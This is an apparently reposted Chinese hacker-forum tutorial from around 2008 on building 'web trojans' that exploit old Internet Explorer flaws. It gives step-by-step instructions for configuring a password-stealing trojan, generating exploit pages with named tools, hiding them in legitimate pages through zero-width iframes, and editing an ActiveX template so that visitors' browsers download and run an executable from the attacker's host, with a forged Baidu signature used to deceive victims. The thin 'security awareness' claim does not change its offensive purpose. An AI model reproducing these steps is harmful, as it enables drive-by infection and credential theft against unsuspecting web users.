什么木马?怎么制造？怎么发？

最佳答案 - 由投票者2008-06-12 23:39:44选出

网页木马大盘点
软件大小： 未知 软件评级：
软件说明： ==============================================================
网页木马大盘点(贺岁版) 制作人：NetTop+ QQ：413567899
赏金猎手-The Safe Team Of Bonus Hunter 祝大家新年快乐 学业有成
请大家支持赏金猎手网安联盟： http://Www.cnhacks.Com
==============================================================
网页木马大盘点(贺岁版)
学习目标：利用微软公布的IE漏洞制作网页木马，教你制作，隐藏，利用。
当然最主要的是希望提高大家的安全意识和防范意识/


上集

相信大家在网上可能看过很多关于网页木马方面的教程了，但是还是有很多朋友
不明白。所以今天就给大家详细的演示一下，资料全部来源与网络。
前言：
第一种：利用古老的MIME漏洞的IE网页木马
这种木马现在还在流行，但因为此漏洞太过古老且适用的IE版本较少，而当时影响
又太大，补丁差不多都补上啦，因此这种木马的种植成功率比较低。
第二种：利用com.ms.activeX.ActiveXComponent漏洞，结合WSH及FSO控件的IE网页木马
虽然漏洞广泛存在于多数IE版本中，是一个比较好的漏洞，利用价值非常高
，但却因为它结合了流行的病毒调用的WSH及FSO控件，使其虽说可以避开网络防
火墙的报警，可逃不脱杀毒软件的追捕（如诺顿）。
第三种：利用OBJECT对象类型确认漏洞（Object　Data　Ramote)并结合
WSH及FSO控件的IE网页木马这个漏洞危险程度很高。
==============================================

一、动鲨网页木马
前段时间非常火暴的Object标签漏洞被大家炒的沸沸扬扬，动鲨就是利用这
个漏洞，而且是比较好的一个。我们可以将木马嵌入网页之中，对方一访问马上
就会中招。
下面我们来配置我们的木马。这里我用的是密码结巴2005。当然你也可以用反弹型
的木马，效果会更好一些。
输入你的邮箱，然后强调一点在高级设置这里把安装提示信息去掉。都配置好了以后
点生成就可以拉。
这个时候提示“是”“否”我们选择NO就是不在本机安装。
然后我们把这个木马上传到我们的空间里去。 这里我随便拿了一个空间。大家可以去
申请一些免费空间来测试一下。 http://bonus.hunter.cn/mm.exe
好了，现在让我们打开动鲨网页木马生成器，把你的木马地址写上去就OK了。
点生成就可以生成一个名为动鲨木马的文件夹里面有这3个文件
然后呢 为了隐蔽 我们把这段代码
<iframe src ="mm.html" name ="zhu" width="0" frameborder="0">放到插入到一个
可以正常浏览的网页文件当中去。这里我随便拿了一个页面。赏金猎手的网页。
好了 现在我们把这4个文件全部都传到空间上去。让别人访问/index2.htm这个文件就可以了
这种办法对普通的网络使用者是非常管用的，但是最新的IE6+UPDATA可以防护。


二、EXE2BMP网页木马
这个木马生成器呢是陈鲸涛写的，他也是利用Object标签漏洞。可以看出这个危害有多大啊
打开exe2bmp.exe 点选择按钮 选择我们的木马文件, 我们还是用刚刚配好的木马mm.exe
会生成3个文件
同样的修改方法了。为了隐蔽 我们把这段代码
<iframe src ="mm.html" name ="zhu" width="0" frameborder="0">放到插入到一个
可以正常浏览的网页文件当中去。这里我随便拿了一个页面。赏金猎手的网页。
也是这个INDEX2.HTM
这样又一个超强的网页木马诞生了。


三、冰狐浪子网页木马
这个木马呢 不需要asp空间支持普通的空间就可以了。
用你的木马程序目录下的"#.exe"
然后运行"冰狐浪子超级网页木马生成器.jse",你会得到文件"icyfox.js"和"icyfox.htm"
最后把"icyfox.js"和"icyfox.htm"上传到你的主页空间,访问"icyfox.htm"就会运行相应的木马程序!

四、证书签名提示的网页木马模板

exe自动下载运行系统这是本站黑鹰基地修改了陈经韬 的“网页自动下载运行系统.”
把数字签名提示改成百度公司的www.baidu.com
这样不会出现“陈经韬的签名提示，容易骗人执行了”。

使用方法：先把文件里的r8r8.ocx上传到你的网页空间，
再修改一下ie.htm里的代码，
1，codebase="http://www.xxx.com/r8r8.ocx#version=1,0,0,0"改为你网页地址，比如我的是放在www.cnhacks.com www.3389.kom.cn下，就改成http://www.cnhacks.com www.3389.kom.cn/r8r8.ocx

2，把<param name="StrUrl" value="http://www.xxx.com/x.exe"> 的www.xxx.com改成你网址，比如我的是www.3800cc.com www.3389.kom.cn,就改成
<param name="StrUrl" value="http://www.cnhacks.com www.3389.kom.cn/x.exe">
x.exe是你要在网页里运行的程序，可放个小点的木马，这样打开快点。

3，把改好的ie.htm放到你空间，别人访问ie.htm里就会执行里面的x.exe程序

=======

好 今天有点晚了 上半部分就到这里吧。 下半部分才是重点。
制作一个网页木马也许是很简单 关键是我们如何来让人相信我们的网页没有木马，放心的来浏览呢！
估计有些安全意识的人都不会打开陌生人发来的网页。所以下节我会给大家讲网页木马的伪装，隐藏
和传播，这写才是关键是。我会很快把下半部分发出来，请大家关注我的网站。

再一次对大家说一声 新年快乐！

欢迎大家支持我的网站: Http://www.cnhacks.com The Safe Team Of Bonus Hunter

NetTop+